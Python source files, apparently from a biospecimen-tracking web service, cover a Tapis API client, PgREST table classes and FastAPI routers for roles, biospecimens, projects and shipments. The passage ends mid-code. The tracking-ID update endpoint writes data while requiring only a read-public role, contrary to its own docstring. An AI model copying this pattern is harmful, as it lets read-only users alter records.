"""Requests client bootstrapped from a Tapis API client
The intended use is to implement methods not expressed by the
current OpenAPI spec and which are thus not accessible in TapiPy.
"""
VERBOSE_ERRORS = True
def __init__(self, tapis_client):
# TODO - Catch when client is missing properties
# token = tapis_client.token.token_info['access_token']
# Always refresh when using a requests call
try:
token = tapis_client.access_token.access_token
except AttributeError:
token = tapis_client.access_token
self.user_agent = "TapisDirectClient/1.0"
self.api_server = tapis_client.base_url
self.api_key = tapis_client.client_id
self.api_secret = tapis_client.client_key
self.verify = tapis_client.verify
self.service_name = None
self.service_version = None
self.api_path = None
self.headers = {"user-agent": self.user_agent}
# Only send Bearer if token is provided
if token:
self.headers["X-Tapis-Token"] = "{}".format(token)
def setup(self, service_name, service_version="v3", api_path=None):
setattr(self, "service_name", service_name)
setattr(self, "service_version", service_version)
setattr(self, "api_path", api_path)
def build_url(self, *args):
arg_els = args
path_els = [self.service_version, self.service_name, self.api_path]
path_els.extend(arg_els)
# TODO - Filter for leading slashes in path_els
# TODO - Strip trailing slash from api_server
url_path_els = [self.api_server]
url_path_els.extend(path_els)
url_path_els = [u for u in url_path_els if u is not None]
return "/".join(url_path_els)
def get(self, path=None):
url = self.build_url(path)
resp = requests.get(url, headers=self.headers, verify=self.verify)
# show_curl(resp, verify=self.verify)
resp = self._raise_for_status(resp)
# resp.raise_for_status()
return resp.json().get("result", {})
def delete(self, path=None):
url = self.build_url(path)
resp = requests.delete(url, headers=self.headers, verify=self.verify)
# show_curl(resp, verify=self.verify)
resp = self._raise_for_status(resp)
# resp.raise_for_status()
return resp.json().get("result", {})
def get_bytes(self, path=None):
url = self.build_url(path)
resp = requests.get(url, headers=self.headers, verify=self.verify)
# show_curl(resp, verify=self.verify)
resp = self._raise_for_status(resp)
# resp.raise_for_status()
return resp
def get_data(self, path=None, params={}):
url = self.build_url(path)
resp = requests.get(
url, headers=self.headers, params=params, verify=self.verify
)
# show_curl(resp, verify=self.verify)
resp = self._raise_for_status(resp)
# resp.raise_for_status()
return resp.json().get("result", {})
def post(self, path=None, data=None, content_type=None, json=None, params=None):
url = self.build_url(path)
post_headers = self.headers
if content_type is not None:
post_headers["Content-type"] = content_type
resp = requests.post(
url,
data=data,
headers=post_headers,
params=params,
json=json,
verify=self.verify,
)
# show_curl(resp, verify=self.verify)
resp = self._raise_for_status(resp)
# Some direct POST actions are management actions that return only a
# message. Thus we try to return "result" first, then fail over
# to returning "message" before handling the most annoying case where
# no response is returned, in which case an empty dict is the
# appropriate response. If there is no JSON available at all,
# return the response body as bytes.
try:
result = resp.json().get("result", resp.json().get("message", {}))
except JSONDecodeError:
result = resp.content
return result
def post_data_basic(self, data=None, auth=None, path=None, content_type=None):
url = self.build_url(path)
post_headers = {"user-agent": self.user_agent}
if content_type is not None:
post_headers["Content-type"] = content_type
if auth is None:
auth = (self.api_key, self.api_secret)
resp = requests.post(
url, headers=post_headers, auth=auth, data=data, verify=self.verify
)
# show_curl(resp, verify=self.verify)
resp = self._raise_for_status(resp)
# The use case for post_data_basic is communicating with
# Tapis APIs that accept only Basic Auth. These include all
# the API manager APIs, and the appropriate response is to
# return the entire JSON payload since APIM responses do not
# adhere to the (status, version, result) structure favored
# by the core Tapis APIs
return resp.json()
def _raise_for_status(self, resp):
"""Handler for requests raise_for_status to capture message from API server responses"""
try:
resp.raise_for_status()
except requests.exceptions.HTTPError as h:
if self.VERBOSE_ERRORS:
# Extract the API JSON message and attach it
# to the HTTPError object before raising it
code = h.response.status_code
reason = h.response.reason + " for " + h.response.url
try:
message = h.response.json().get("message")
except Exception:
message = h.response.text
raise requests.exceptions.HTTPError(
code, reason, message, response=h.response, request=h.request
)
else:
raise h
return resp
# NOTE - One idea is to implement left/right relations in the connection class.
# For example, do a retrieve on an object, then inspect to see if it has
# any relations. If so, retrieve the related object and attach it to
# the current one as a named property. This would be done recursively
# through the related object tree. Rendering to a dict/JSON for
# consumption/usage would be recursive as well. We would not directly
# support updates. Deletes should be supported implicitly via built-in
# foreign key on_delete behavior.
```
#### File: vbr/pgrest/foreign_key.py
```python
from .config import Config
__all__ = ["ForeignKey"]
ON_EVENT_ALLOWED = ["ON DELETE", "ON UPDATE"]
EVENT_ACTION_ALLOWED = ["CASCADE", "SET_NULL", "SET DEFAULT", "RESTRICT", "NO ACTION"]
class ForeignKey(object):
def __init__(self, source, on_event="ON DELETE", event_action="RESTRICT"):
self.foreign_key = True
(self.reference_table, self.reference_column) = source.split(".")
self.on_event = None
self.event_action = None
if on_event:
on_event = on_event.upper()
if on_event not in ON_EVENT_ALLOWED:
raise ValueError("Invalid value {0} for on_event".format(on_event))
else:
self.on_event = on_event
if event_action:
event_action = event_action.upper()
if event_action not in EVENT_ACTION_ALLOWED:
raise ValueError(
"Invalid value {0} for event_action".format(event_action)
)
else:
self.event_action = event_action
def properties(self):
data = {
"foreign_key": self.foreign_key,
"reference_table": self.reference_table,
"reference_column": self.reference_column,
}
if self.on_event:
data["on_event"] = self.on_event
if self.event_action:
data["event_action"] = self.event_action
return data
```
#### File: vbr/pgrest/table.py
```python
import copy
import datetime
import json
from .column import Column
from .constraints import Constraint
from .enums import Enumeration
from .schema import PgrestSchema
from .utils import datetime_to_isodate
__all__ = ["Table", "AssociationTable"]
class Table(object):
"""PgREST Table"""
__tablename__ = None
__rooturl__ = None
# TODO - support for generating create/update JSON for PgREST
def __init__(self, table_id=None, **kwargs):
self.__table_id__ = table_id
self.__class_attrs__ = {}
self.__schema__ = PgrestSchema(self)
# This supports logging the original value for attrs implemented in __setattr__ below
self.__original_attrs__ = {}
# Move class-defined attributes into a private var
# Create regular properties holding values passed in via constructor
for aname in dir(self):
attr = getattr(self, aname)
if isinstance(attr, (Enumeration, Constraint)):
self.__class_attrs__[aname] = attr
# TODO - use validate() from attr
setattr(self, aname, kwargs.get(aname, None))
if isinstance(attr, Column):
self.__class_attrs__[aname] = attr
# TODO - use validate() from attr
setattr(self, aname, attr.ctype.instantiate(kwargs.get(aname, None)))
# Set _pkid
# Helpful for update and other maintenance tasks
setattr(self, "_pkid", kwargs.get("_pkid", None))
def __repr__(self):
values = []
for v in self.__schema__.column_names:
values.append("{0}={1}".format(v, getattr(self, v, None)))
return "{0}: {1}".format(self.__class__.__name__, ",".join(values))
def __setattr__(self, key, value):
"""Capture original attribute values specified at instantiation before allowing them to be updated."""
# This supports the ability to know what attributes
# have changed in support of doing a vbr.update_row(object)
try:
current = getattr(self, key)
if not isinstance(current, Column):
if key not in self.__original_attrs__:
self.__original_attrs__[key] = current
except Exception:
pass
super().__setattr__(key, value)
def updates(self) -> dict:
"""Return a dict of attributes updated since instantation."""
return self.__original_attrs__
def clone(self):
"""Return a mutable clone of this VBR object."""
return copy.deepcopy(self)
def dict(self):
"""Return a dict filtered for use in row insert or update operations"""
dct = {}
for v in self.__schema__.column_names:
_d = getattr(self, v, None)
# Cast to proper Python type
d = self.__class_attrs__[v].ctype.cast(_d)
# Do not populate dict with None values where attribute is a primary key
# Do not populate dict with None values if attribute is nullable
nullable = self.__class_attrs__[v].nullable
is_pk = self.__class_attrs__[v].primary_key
if d is not None:
dct[v] = d
elif nullable is False and is_pk is False:
dct[v] = d
return dct
def json(self, indent=0, sort_keys=True, class_name=None):
# TODO - deal with datetime
return json.dumps(
self.dict(), indent=indent, sort_keys=sort_keys, cls=class_name
)
def primary_key_id(self):
"""Return value of VBR row primary key."""
return getattr(self, "_pkid", None)
class AssociationTable(Table):
__left__ = None
__right__ = None
```
#### File: vbr/utils/time.py
```python
import datetime
import pytz
__all__ = ["timestamp", "utc_time_in_seconds"]
def timestamp() -> datetime.datetime:
"""Returns the current UTC-localized datetime"""
tz = pytz.timezone("UTC")
return tz.localize(datetime.datetime.utcnow())
def utc_time_in_seconds() -> str:
"""Return string of UTC time in seconds."""
return str(int(datetime.datetime.today().timestamp()))
``` |
{
"source": "a2cps/vbr-app",
"score": 2
} |
#### File: application/internal/admin.py
```python
from datetime import datetime
from enum import Enum
from fastapi import APIRouter, Body, Depends, HTTPException
from pydantic import BaseModel, EmailStr
from tapipy.tapis import Tapis
from ..config import get_settings
from ..dependencies import *
settings = get_settings()
router = APIRouter(
prefix="/admin",
tags=["admin"],
responses={404: {"description": "Not found"}},
route_class=LoggingRoute,
)
class GrantableRole(Enum):
VBR_ADMIN = "VBR_ADMIN"
VBR_READ_ANY_PHI = "VBR_READ_ANY_PHI"
VBR_READ_LIMITED_PHI = "VBR_READ_LIMITED_PHI"
VBR_READ_PUBLIC = "VBR_READ_PUBLIC"
VBR_WRITE_ANY = "VBR_WRITE_ANY"
VBR_WRITE_PUBLIC = "VBR_WRITE_PUBLIC"
class Role(Enum):
VBR_USER = "VBR_USER"
VBR_ADMIN = "VBR_ADMIN"
VBR_READ_ANY_PHI = "VBR_READ_ANY_PHI"
VBR_READ_LIMITED_PHI = "VBR_READ_LIMITED_PHI"
VBR_READ_PUBLIC = "VBR_READ_PUBLIC"
VBR_WRITE_ANY = "VBR_WRITE_ANY"
VBR_WRITE_PUBLIC = "VBR_WRITE_PUBLIC"
"VBR_READ_ANY", "VBR_READ_ANY_PHI", "VBR_READ_LIMITED_PHI", "VBR_READ_PUBLIC", "VBR_USER", "VBR_WRITE_PUBLIC"
class TapisRole(BaseModel):
name: str
description: str
owner: str
# updated: datetime
# updatedby: str
class Config:
schema_extra = {
"example": {
"name": "TACO_USER",
"description": "Default user role",
"owner": "tacobot",
}
}
class User(BaseModel):
username: str
name: str
email: EmailStr
class Config:
schema_extra = {
"example": {
"username": "tacobot",
"name": "<NAME>",
"email": "<EMAIL>",
}
}
class AddUser(BaseModel):
username: str
role: Optional[Role] = "VBR_READ_PUBLIC"
class Config:
schema_extra = {"example": {"username": "tacobot", "role": "VBR_READ_PUBLIC"}}
def build_user(username: str, client: Tapis) -> User:
profile = client.authenticator.get_profile(username=username)
user = {
"username": profile.username,
"name": "{0} {1}".format(profile.given_name, profile.last_name),
"email": profile.email,
}
return user
@router.get(
"/roles",
dependencies=[Depends(tapis_client), Depends(vbr_admin)],
response_model=List[TapisRole],
)
def list_roles(client: Tapis = Depends(tapis_client)):
"""List VBR roles."""
role_names = client.sk.getRoleNames(tenant=settings.tapis_tenant_id).names
roles = []
for rn in role_names:
if rn in [e.value for e in Role]:
role = client.sk.getRoleByName(tenant=settings.tapis_tenant_id, roleName=rn)
roles.append(
{
"name": role.name,
"description": role.description,
"owner": role.owner,
}
)
return roles
@router.get(
"/users",
dependencies=[Depends(tapis_client), Depends(vbr_admin)],
response_model=List[User],
)
def list_users(client: Tapis = Depends(tapis_client)):
"""List authorized users."""
usernames = client.sk.getUsersWithRole(
tenant=settings.tapis_tenant_id, roleName="VBR_USER"
).names
users = [build_user(u, client) for u in usernames]
return users
@router.post(
"/users",
dependencies=[Depends(tapis_client), Depends(vbr_admin)],
response_model=User,
)
def add_user(body: AddUser = Body(...), client: Tapis = Depends(tapis_client)):
"""Add an authorized user."""
try:
client.sk.grantRole(
tenant=settings.tapis_tenant_id,
user=body.username,
roleName=body.role.value,
)
return build_user(username=body.username, client=client)
except Exception:
raise
@router.get(
"/user/{username}",
dependencies=[Depends(tapis_client), Depends(vbr_admin)],
response_model=User,
)
def get_user(username: str, client: Tapis = Depends(tapis_client)):
"""Get profile of an authorized user."""
if (
"VBR_USER"
in client.sk.getUserRoles(user=username, tenant=settings.tapis_tenant_id).names
):
user_profile = build_user(username, client)
return User(**user_profile)
else:
raise HTTPException(status_code=404, detail="Not an authorized VBR user")
@router.get(
"/user/{username}/roles",
dependencies=[Depends(tapis_client), Depends(vbr_admin)],
response_model=List[Role],
)
def list_user_roles(username: str, client: Tapis = Depends(tapis_client)):
"""List roles for an authorized user."""
roles = [
r
for r in client.sk.getUserRoles(
tenant=settings.tapis_tenant_id, user=username
).names
if r in [e.value for e in Role]
]
roles = sorted(roles)
return roles
@router.put(
"/user/{username}/roles",
dependencies=[Depends(tapis_client), Depends(vbr_admin)],
response_model=List[Role],
)
def grant_user_role(
username: str,
role: GrantableRole = "VBR_READ_PUBLIC",
client: Tapis = Depends(tapis_client),
):
"""Grant a role to a user."""
client.sk.grantRole(
tenant=settings.tapis_tenant_id, user=username, roleName=role.value
)
# Return list of roles for user
roles = [
r
for r in client.sk.getUserRoles(
tenant=settings.tapis_tenant_id, user=username
).names
if r in [e.value for e in Role]
]
roles = sorted(roles)
return roles
@router.delete(
"/user/{username}/roles/{role}",
dependencies=[Depends(tapis_client), Depends(vbr_admin)],
response_model=List[Role],
)
def revoke_user_role(username: str, role: Role, client: Tapis = Depends(tapis_client)):
"""Revoke a role from a user.
Note: Inherited roles (such as VBR_USER) cannot be revoked using this method.
"""
client.sk.revokeUserRole(
tenant=settings.tapis_tenant_id, user=username, roleName=role.value
)
roles = [
r
for r in client.sk.getUserRoles(
tenant=settings.tapis_tenant_id, user=username
).names
if r in [e.value for e in Role]
]
roles = sorted(roles)
return roles
```
#### File: application/routers/biospecimens.py
```python
from typing import Dict
from fastapi import APIRouter, Body, Depends, HTTPException
from vbr.api import VBR_Api, measurement
from vbr.utils.barcode import generate_barcode_string, sanitize_identifier_string
from application.routers.models.actions import comment, trackingid
from ..dependencies import *
from .models import (
Biospecimen,
BiospecimenPrivate,
BiospecimenPrivateExtended,
Comment,
CreateComment,
Event,
GenericResponse,
PartitionBiospecimen,
RunListBase,
SetBiospecimenStatus,
SetContainer,
SetTrackingId,
SetVolume,
transform,
)
from .utils import parameters_to_query
router = APIRouter(
prefix="/biospecimens",
tags=["biospecimens"],
responses={404: {"description": "Not found"}},
route_class=LoggingRoute,
)
@router.get(
"/", dependencies=[Depends(vbr_read_public)], response_model=List[Biospecimen]
)
def list_biospecimens(
# See views/biospecimens_details.sql for possible filter names
biospecimen_id: Optional[str] = None,
tracking_id: Optional[str] = None,
biospecimen_type: Optional[str] = None,
collection_id: Optional[str] = None,
collection_tracking_id: Optional[str] = None,
container_id: Optional[str] = None,
container_tracking_id: Optional[str] = None,
location_id: Optional[str] = None,
location_display_name: Optional[str] = None,
protocol_name: Optional[str] = None,
project: Optional[str] = None,
status: Optional[str] = None,
unit: Optional[str] = None,
subject_id: Optional[str] = None,
subject_guid: Optional[str] = None,
bscp_procby_initials: Optional[str] = None,
bscp_protocol_dev: Optional[bool] = None,
client: VBR_Api = Depends(vbr_admin_client),
common=Depends(limit_offset),
):
"""List Biospecimens.
Refine results using filter parameters.
Requires: **VBR_READ_PUBLIC**"""
query = parameters_to_query(
biospecimen_id=biospecimen_id,
tracking_id=tracking_id,
biospecimen_type=biospecimen_type,
collection_id=collection_id,
collection_tracking_id=collection_tracking_id,
container_id=container_id,
container_tracking_id=container_tracking_id,
location_id=location_id,
location_display_name=location_display_name,
protocol_name=protocol_name,
project=project,
status=status,
unit=unit,
subject_id=subject_id,
subject_guid=subject_guid,
bscp_procby_initials=bscp_procby_initials,
bscp_protocol_dev=bscp_protocol_dev,
)
rows = [
transform(c)
for c in client.vbr_client.query_view_rows(
view_name="biospecimens_details",
query=query,
limit=common["limit"],
offset=common["offset"],
)
]
return rows
# GET /private
@router.get(
"/private",
dependencies=[Depends(vbr_read_limited_phi)],
response_model=List[BiospecimenPrivate],
)
def list_biospecimens_with_limited_phi(
client: VBR_Api = Depends(vbr_admin_client), common=Depends(limit_offset)
):
"""List Biospecimens with limited PHI.
Requires: **VBR_READ_LIMITED_PHI**"""
# TODO - build up from filters
query = {}
rows = [
transform(c)
for c in client.vbr_client.query_view_rows(
view_name="biospecimens_details_private",
query=query,
limit=common["limit"],
offset=common["offset"],
)
]
return rows
# GET /{biospecimen_id}
@router.get(
"/{biospecimen_id}",
dependencies=[Depends(vbr_read_public)],
response_model=Biospecimen,
)
def get_biospecimen_by_id(
biospecimen_id: str,
client: VBR_Api = Depends(vbr_admin_client),
):
"""Get a Biospecimen by ID.
Requires: **VBR_READ_PUBLIC**"""
query = {"biospecimen_id": {"operator": "eq", "value": biospecimen_id}}
row = transform(
client.vbr_client.query_view_rows(
view_name="biospecimens_details", query=query, limit=1, offset=0
)[0]
)
return row
# POST /{biospecimen_id}/partition
@router.post(
"/{biospecimen_id}/partition",
dependencies=[Depends(vbr_write_public)],
response_model=Biospecimen,
)
def partition_biospecimen(
biospecimen_id: str,
body: PartitionBiospecimen = Body(...),
client: VBR_Api = Depends(vbr_admin_client),
):
"""Partition a Biospecimen into two Biospecimens.
Requiress: **VBR_WRITE_PUBLIC**
"""
biospecimen_id = vbr.utils.sanitize_identifier_string(biospecimen_id)
new_tracking_id = vbr.utils.sanitize_identifier_string(body.tracking_id)
measurement = client.get_measurement_by_local_id(biospecimen_id)
new_measurement = client.partition_measurement(
measurement, volume=body.volume, tracking_id=new_tracking_id, comment=comment
)
query = {"biospecimen_id": {"operator": "eq", "value": new_measurement.local_id}}
row = transform(
client.vbr_client.query_view_rows(
view_name="biospecimens_details", query=query, limit=1, offset=0
)[0]
)
return row
# DELETE /{biospecimen_id}
@router.delete(
"/{biospecimen_id}/partition",
dependencies=[Depends(vbr_admin)],
response_model=GenericResponse,
)
def delete_biospecimen(
biospecimen_id: str,
client: VBR_Api = Depends(vbr_admin_client),
):
"""Delete a Biospecimen from the system.
Requiress: **VBR_ADMIN**
"""
biospecimen_id = vbr.utils.sanitize_identifier_string(biospecimen_id)
measurement = client.get_measurement_by_local_id(biospecimen_id)
client.vbr_client.delete_row(measurement)
return {"message": "Biospecimen deleted"}
@router.get(
"/{biospecimen_id}/private",
dependencies=[Depends(vbr_read_any_phi)],
response_model=BiospecimenPrivateExtended,
)
def get_biospecimen_by_id_with_extended_phi(
biospecimen_id: str,
client: VBR_Api = Depends(vbr_admin_client),
):
"""Get a Biospecimen with extended PHI by ID.
Requires: **VBR_READ_ANY_PHI**"""
biospecimen_id = vbr.utils.sanitize_identifier_string(biospecimen_id)
query = {"biospecimen_id": {"operator": "eq", "value": biospecimen_id}}
row = transform(
client.vbr_client.query_view_rows(
view_name="biospecimens_details_private", query=query, limit=1, offset=0
)[0]
)
return row
# GET /tracking/{tracking_id}
@router.get(
"/tracking/{tracking_id}",
dependencies=[Depends(vbr_read_public)],
response_model=Biospecimen,
)
def get_biospecimen_by_tracking_id(
tracking_id: str,
client: VBR_Api = Depends(vbr_admin_client),
):
"""Get a Biospecimen by Tracking ID.
Requires: **VBR_READ_PUBLIC**"""
tracking_id = sanitize_identifier_string(tracking_id)
query = {"tracking_id": {"operator": "eq", "value": tracking_id}}
row = transform(
client.vbr_client.query_view_rows(
view_name="biospecimens_details", query=query, limit=1, offset=0
)[0]
)
return row
# PATCH /{biospecimen_id}/container
@router.patch(
"/{biospecimen_id}/container",
dependencies=[Depends(vbr_write_public)],
response_model=Biospecimen,
)
def update_biospecimen_container(
biospecimen_id: str,
body: SetContainer = Body(...),
client: VBR_Api = Depends(vbr_admin_client),
):
"""Move a Biospecimen to another Container.
Requires: **VBR_WRITE_PUBLIC**"""
biospecimen_id = sanitize_identifier_string(biospecimen_id)
container_id = sanitize_identifier_string(body.container_id)
measurement = client.rebox_measurement_by_local_id(
local_id=biospecimen_id, container_local_id=container_id
)
query = {"biospecimen_id": {"operator": "eq", "value": measurement.local_id}}
row = transform(
client.vbr_client.query_view_rows(
view_name="biospecimens_details", query=query, limit=1, offset=0
)[0]
)
return row
# PATCH /{biospecimen_id}/status
@router.patch(
"/{biospecimen_id}/status",
dependencies=[Depends(vbr_write_public)],
response_model=Biospecimen,
)
def update_biospecimen_status(
biospecimen_id: str,
body: SetBiospecimenStatus = Body(...),
client: Tapis = Depends(vbr_admin_client),
):
"""Update Biospecimen status.
Requires: **VBR_WRITE_PUBLIC**"""
biospecimen_id = sanitize_identifier_string(biospecimen_id)
measurement = client.get_measurement_by_local_id(biospecimen_id)
measurement = client.update_measurement_status_by_name(
measurement, status_name=body.status.value, comment=body.comment
)
# TODO - take any requisite actions associated with specific statuses
query = {"biospecimen_id": {"operator": "eq", "value": measurement.local_id}}
row = transform(
client.vbr_client.query_view_rows(
view_name="biospecimens_details", query=query, limit=1, offset=0
)[0]
)
return row
# PATCH /{biospecimen_id}/tracking_id
@router.patch(
"/{biospecimen_id}/tracking_id",
dependencies=[Depends(vbr_read_public)],
response_model=Biospecimen,
)
def update_biospecimen_tracking_id(
biospecimen_id: str,
body: SetTrackingId = Body(...),
client: VBR_Api = Depends(vbr_admin_client),
):
"""Update a Biospecimen tracking ID.
Requires: **VBR_WRITE_PUBLIC**"""
biospecimen_id = sanitize_identifier_string(biospecimen_id)
tracking_id = sanitize_identifier_string(body.tracking_id)
# TODO propagate comment
measurement = client.get_measurement_by_local_id(biospecimen_id)
measurement.tracking_id = tracking_id
measurement = client.vbr_client.update_row(measurement)
query = {"biospecimen_id": {"operator": "eq", "value": measurement.local_id}}
row = transform(
client.vbr_client.query_view_rows(
view_name="biospecimens_details", query=query, limit=1, offset=0
)[0]
)
return row
# PATCH /{biospecimen_id}/volume
@router.patch(
"/{biospecimen_id}/volume",
dependencies=[Depends(vbr_write_public)],
response_model=Biospecimen,
)
def update_biospecimen_volume(
biospecimen_id: str,
body: SetVolume = Body(...),
client: VBR_Api = Depends(vbr_admin_client),
):
"""Update a Biospecimen volume.
Requires: **VBR_WRITE_PUBLIC**"""
biospecimen_id = sanitize_identifier_string(biospecimen_id)
volume = body.volume
comment = body.comment
measurement = client.get_measurement_by_local_id(biospecimen_id)
measurement = client.set_volume(measurement, volume, comment)
query = {"biospecimen_id": {"operator": "eq", "value": measurement.local_id}}
row = transform(
client.vbr_client.query_view_rows(
view_name="biospecimens_details", query=query, limit=1, offset=0
)[0]
)
return row
# GET /{biospecimen_id}/events
@router.get(
"/{biospecimen_id}/events",
dependencies=[Depends(vbr_read_public)],
response_model=List[Event],
)
def get_events_for_biospecimen(
biospecimen_id: str,
client: VBR_Api = Depends(vbr_admin_client),
):
"""Get Events for a Biospecimen.
Requires: **VBR_READ_PUBLIC**"""
biospecimen_id = sanitize_identifier_string(biospecimen_id)
query = {"biospecimen_id": {"operator": "=", "value": biospecimen_id}}
rows = [
transform(c)
for c in client.vbr_client.query_view_rows(
view_name="biospecimens_data_events_public",
query=query,
limit=0,
offset=0,
)
]
return rows
# GET /{biospecimen_id}/comments
@router.get(
"/{biospecimen_id}/comments",
dependencies=[Depends(vbr_read_public)],
response_model=List[Comment],
)
def get_comments_for_biospecimen(
biospecimen_id: str,
client: VBR_Api = Depends(vbr_admin_client),
):
"""Get Comments for a Biospecimen.
Requires: **VBR_READ_PUBLIC**"""
biospecimen_id = sanitize_identifier_string(biospecimen_id)
# TODO - change name of field to shipment_tracking_id after updating containers_public.sql
query = {"biospecimen_id": {"operator": "=", "value": biospecimen_id}}
rows = [
transform(c)
for c in client.vbr_client.query_view_rows(
view_name="biospecimens_comments_public",
query=query,
limit=0,
offset=0,
)
]
return rows
@router.post(
"/{biospecimen_id}/comments",
dependencies=[Depends(vbr_write_public)],
response_model=Comment,
)
def add_biospecimen_comment(
biospecimen_id: str,
body: CreateComment = Body(...),
client: VBR_Api = Depends(vbr_admin_client),
):
"""Add a Comment to a Biospecimen.
Requires: **VBR_WRITE_PUBLIC**"""
biospecimen_id = sanitize_identifier_string(biospecimen_id)
measurement = client.get_measurement_by_local_id(biospecimen_id)
data_event = client.create_and_link(comment=body.comment, link_target=measurement)[
0
]
return Comment(comment=data_event.comment, timestamp=data_event.event_ts)
# TODO
# POST /partition - partition a biospecimen into two
# GET /{biospecimen_id}/runlists
@router.get(
"/{biospecimen_id}/runlists",
dependencies=[Depends(vbr_read_public)],
response_model=List[RunListBase],
)
def get_runlists_for_biospecimen(
biospecimen_id: str,
client: VBR_Api = Depends(vbr_admin_client),
):
"""Get Runlists for a Biospecimen.
Requires: **VBR_READ_PUBLIC**"""
biospecimen_id = sanitize_identifier_string(biospecimen_id)
# TODO - change name of field to shipment_tracking_id after updating containers_public.sql
query = {"biospecimen_id": {"operator": "=", "value": biospecimen_id}}
rows = [
transform(c)
for c in client.vbr_client.query_view_rows(
view_name="runlists_biospecimens_public",
query=query,
limit=0,
offset=0,
)
]
return rows
```
#### File: application/routers/projects.py
```python
from typing import Dict
from fastapi import APIRouter, Body, Depends, HTTPException
from vbr.api import VBR_Api
from vbr.utils.barcode import generate_barcode_string, sanitize_identifier_string
from ..dependencies import *
from .models import Project, transform
from .utils import parameters_to_query
router = APIRouter(
prefix="/projects",
tags=["projects"],
responses={404: {"description": "Not found"}},
route_class=LoggingRoute,
)
@router.get("/", dependencies=[Depends(vbr_read_public)], response_model=List[Project])
def list_projects(
# See views/projects_public.sql for possible filter names
project_id: Optional[str] = None,
name: Optional[str] = None,
abbreviation: Optional[str] = None,
description: Optional[str] = None,
client: VBR_Api = Depends(vbr_admin_client),
common=Depends(limit_offset),
):
"""List Projects.
Refine results using filter parameters.
Requires: **VBR_READ_PUBLIC**"""
# TODO - build up from filters
query = parameters_to_query(
project_id=project_id,
name=name,
abbreviation=abbreviation,
description=description,
)
rows = [
transform(c)
for c in client.vbr_client.query_view_rows(
view_name="projects_public",
query=query,
limit=common["limit"],
offset=common["offset"],
)
]
return rows
@router.get(
"/{project_id}", dependencies=[Depends(vbr_read_public)], response_model=Project
)
def get_project_by_id(
project_id: str,
client: VBR_Api = Depends(vbr_admin_client),
):
"""Get a Project by ID.
Requires: **VBR_READ_PUBLIC**"""
query = {"project_id": {"operator": "eq", "value": project_id}}
row = transform(
client.vbr_client.query_view_rows(
view_name="projects_public", query=query, limit=1, offset=0
)[0]
)
return row
# TODO
# PUT /{project_id} - update project
# POST / - create new project
```
#### File: application/routers/shipments.py
```python
from typing import Dict
from fastapi import APIRouter, Body, Depends, HTTPException
from vbr.api import VBR_Api, tracking_id
from vbr.utils.barcode import generate_barcode_string, sanitize_identifier_string
from application.routers import container_types
from application.routers.models.actions.comment import Comment
from application.routers.models.actions.shipment import CreateShipment
from ..dependencies import *
from .models import (
AddContainer,
Container,
CreateComment,
Event,
SetShipmentStatus,
Shipment,
transform,
)
from .utils import parameters_to_query
router = APIRouter(
prefix="/shipments",
tags=["shipments"],
responses={404: {"description": "Not found"}},
route_class=LoggingRoute,
)
@router.get("/", dependencies=[Depends(vbr_read_public)], response_model=List[Shipment])
def list_shipments(
# See views/shipments_public.sql for possible filter names
shipment_id: Optional[str] = None,
tracking_id: Optional[str] = None,
shipment_name: Optional[str] = None,
sender_name: Optional[str] = None,
project_name: Optional[str] = None,
ship_from: Optional[str] = None,
ship_to: Optional[str] = None,
status: Optional[str] = None,
client: VBR_Api = Depends(vbr_admin_client),
common=Depends(limit_offset),
):
"""List Shipments.
Refine results using filter parameters.
Requires: **VBR_READ_PUBLIC**"""
query = parameters_to_query(
shipment_id=shipment_id,
tracking_id=tracking_id,
shipment_name=shipment_name,
sender_name=sender_name,
ship_from=ship_from,
ship_to=ship_to,
status=status,
)
rows = [
transform(c)
for c in client.vbr_client.query_view_rows(
view_name="shipments_public",
query=query,
limit=common["limit"],
offset=common["offset"],
)
]
return rows
@router.post("/", dependencies=[Depends(vbr_write_public)], response_model=Shipment)
def create_shipment(
body: CreateShipment = Body(...),
client: VBR_Api = Depends(vbr_admin_client),
):
"""Create a Shipment.
Requires: **VBR_WRITE_PUBLIC**"""
sender_name = body.sender_name
name = body.name
tracking_id = sanitize_identifier_string(body.tracking_id)
project_local_id = sanitize_identifier_string(body.project_id)
ship_to_local_id = sanitize_identifier_string(body.ship_to_location_id)
ship_from_local_id = sanitize_identifier_string(body.ship_from_location_id)
container_ids = [sanitize_identifier_string(c) for c in body.container_ids]
try:
project_id = client.get_project_by_local_id(project_local_id).project_id
except Exception:
raise HTTPException(
status_code=404,
detail="Could not find project {0}".format(project_local_id),
)
try:
ship_to_id = client.get_location_by_local_id(ship_to_local_id).location_id
except Exception:
raise HTTPException(
status_code=404,
detail="Could not find location {0}".format(ship_to_local_id),
)
try:
ship_from_id = client.get_location_by_local_id(ship_from_local_id).location_id
except Exception:
raise HTTPException(
status_code=404,
detail="Could not find location {0}".format(ship_from_local_id),
)
try:
containers = [client.get_container_by_local_id(c) for c in container_ids]
except Exception as exc:
raise HTTPException(
status_code=404,
detail="One or more container_ids could not be resolved: {0}".format(exc),
)
data = {
"name": name,
"sender_name": sender_name,
"tracking_id": tracking_id,
"project_id": project_id,
"ship_to_id": ship_to_id,
"ship_from_id": ship_from_id,
}
try:
shipment = client.create_shipment(**data)
# Ff containers are provided, associate them with Shipment
for container in containers:
try:
client.associate_container_with_shipment(container, shipment)
except Exception:
# TODO improve error handling
raise
# TODO Create EasyPost tracker
# Return created shipment
query = {"shipment_id": {"operator": "eq", "value": shipment.local_id}}
row = transform(
client.vbr_client.query_view_rows(
view_name="shipments_public", query=query, limit=1, offset=0
)[0]
)
return row
except Exception as exc:
raise
# raise HTTPException(status_code=500, detail=str(exc))
@router.get(
"/{shipment_id}", dependencies=[Depends(vbr_read_public)], response_model=Shipment
)
def get_shipment_by_id(
shipment_id: str,
client: VBR_Api = Depends(vbr_admin_client),
):
"""Get a Shipment by ID.
Requires: **VBR_READ_PUBLIC**"""
query = {"shipment_id": {"operator": "eq", "value": shipment_id}}
row = transform(
client.vbr_client.query_view_rows(
view_name="shipments_public", query=query, limit=1, offset=0
)[0]
)
return row
@router.get(
"/tracking/{tracking_id}",
dependencies=[Depends(vbr_read_public)],
response_model=Shipment,
)
def get_shipment_by_tracking_id(
tracking_id: str,
client: VBR_Api = Depends(vbr_admin_client),
):
"""Get a Shipment by parcel tracking ID.
Requires: **VBR_READ_PUBLIC**"""
tracking_id = sanitize_identifier_string(tracking_id)
query = {"tracking_id": {"operator": "eq", "value": tracking_id}}
row = transform(
client.vbr_client.query_view_rows(
view_name="shipments_public", query=query, limit=1, offset=0
)[0]
)
return row
# GET /tracking/{tracking_id}/containers
@router.get(
"/tracking/{tracking_id}/containers",
